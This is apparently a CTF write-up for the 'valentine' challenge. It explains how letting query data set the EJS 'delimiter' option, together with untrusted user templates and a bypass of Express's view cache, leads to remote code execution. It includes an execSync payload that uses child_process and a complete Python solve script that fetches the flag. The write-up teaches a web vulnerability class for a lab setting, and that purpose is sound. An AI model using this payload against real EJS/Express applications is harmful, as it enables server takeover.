Writeup of challenge valentine from our recent CTF.
Inspired by https://eslam.io/posts/ejs-server-side-template-injection-rce/, who was able to exploit the ejs templating engine using prototype pollution. But this was fixed in ejs 3.1.7. Let’s investigate the current release.
In his analysis, Eslam even scratches the possibility to overwrite options which are passed with data. He specifically mentions the delimiter in the context of abusing it for catastrophic regex.
eexports.render = function (template, d, o) {
var data = d || utils.createNullProtoObjWherePossible();
var opts = o || utils.createNullProtoObjWherePossible();
// No options object -- if there are optiony names
// in the data, copy them to options
if (arguments.length == 2) {
utils.shallowCopyFromList(opts, data, _OPTS_PASSABLE_WITH_DATA);
}
return handleCache(opts, template)(data);
};
While reading this blog post, what immediatelly bothered me is the question of:
In what scenario does anybody even want to pass options with untrusted user data?
Especially: Options which greatly affect the parsing of the template like delimiter
?
And: Could this “feature” maybe be abused in any way?
Thus, the idea for this challenge was born.
Several CMS systems or admin interfaces around the world offer users the option to customize their own e-mail, footer, headeer, … templates. So the use case to have untrusted templates is quite valid.
So what would happen, if we combine untrusted templates with untrusted user-input? RCE of course.
For this, we upload default NodeJS RCE which reads the flag:
<.- global.process.mainModule.constructor._load(`child_process`).execSync(`/readflag`).toString() .>
In the Dockerfile, the node environment is set to production.
ENV NODE_ENV=production
This causes Express to cache views.
if (env === 'production') {
this.enable('view cache');
}
Since the POST request redirects directly to the template without the delimiter, the default delimiter of %
is cached and a later overwrite is not possible.
But it’s possible to disallow redirects:
requests.port(..., allow_redirects=False)
network.http.redirection-limit
to 1
in about:config
If then accessing the site with delimiter=.
set, the new delimiter
will be used returning the flag in the template.
hxp{W1ll_u_b3_my_V4l3nt1ne?}
#!/usr/bin/env python3
import requests
import re
HOST = 'TODO'
PORT = TODO
# write template
r = requests.post(f"http://{HOST}:{PORT}/template", data={"tmpl":"""<.- global.process.mainModule.constructor._load(`child_process`).execSync(`/readflag`).toString() .>"""}, allow_redirects=False)
# change delimiter
m = re.search(r"Redirecting to /(?P<uuid>.*)?name=", r.text)
r = requests.get(f"http://{HOST}:{PORT}/{m.group('uuid')}?name=a&delimiter=.")
m = re.search(r"hxp\{[^}]+\}", r.text)
print(m.group(0))